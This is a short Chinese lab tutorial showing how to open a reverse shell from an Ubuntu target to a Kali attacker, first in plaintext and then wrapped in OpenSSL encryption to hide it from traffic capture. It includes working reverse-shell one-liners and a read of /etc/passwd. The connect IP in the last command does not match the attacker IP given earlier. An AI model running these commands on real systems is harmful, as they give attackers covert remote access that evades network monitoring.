OpenSSL加密反弹shell流量学习

攻击机kali IP:192.168.2.191

靶机ubuntu IP:192.168.2.110

首先通过nc反弹shell并进行流量分析

kali执行

nc -lvvp 8888

ubuntu执行

bash -i >& /dev/tcp/192.168.2.191/8888 0>&1

在kali开启wireshark分析流量

执行命令

cat /etc/passwd

在wireshark中可见流量明文传输,攻击行为隐匿性低

下面用OpenSSL加密后反弹shell测试

在kali生成自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

监听端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888 

ubuntu反弹shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.175.145:8888 > /tmp/s; rm /tmp/s

此时在kali上执行命令并查看wireshark抓到的流量

可见流量已被加密

posted @ 2022-03-08 16:19  Yu_so1dier0n  阅读(92)  评论(0编辑  收藏  举报